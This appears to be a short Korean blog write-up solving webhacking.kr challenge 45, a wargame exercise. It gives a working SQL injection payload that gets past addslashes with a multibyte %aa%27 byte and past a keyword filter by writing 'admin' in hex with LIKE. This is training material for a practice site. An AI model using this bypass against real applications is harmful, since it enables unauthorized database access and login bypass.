id와 pw에 addslashes함수 적용
id값은 멀티바이트 문잘 바뀜
id와 pw에서
admin, select, limit, pw, =, >, < 필터링
쿼리문
select id from chall45 where id='{$_GET['id']}' and pw=md5('{$_GET['pw']}')로
admin이 나오면 클리어
멀티바이트 문자는 저번에 다른 문제에서
%aa%27로 보내면 싱글쿼터가 사용가능했었음
id=gue%aa%27%23&pw=아무거나
select id from chall45 where id='~~'||id like 0x61646d696e#' and pw=md5('~~~')
-> select id from chall45 where id='~~' || id like 0x61646d696e
admin이 나오게 된다
'Wargame, CTF > webhacking.kr' 카테고리의 다른 글
| Webhacking.kr 9번 (0) | 2020.01.03 |
|---|---|
| Webhacking.kr 57번 (0) | 2020.01.03 |
| Webhacking.kr 40번 (0) | 2020.01.03 |
| Webhacking.kr 22번 (0) | 2020.01.03 |
| Webhacking.kr 2번 (0) | 2020.01.02 |
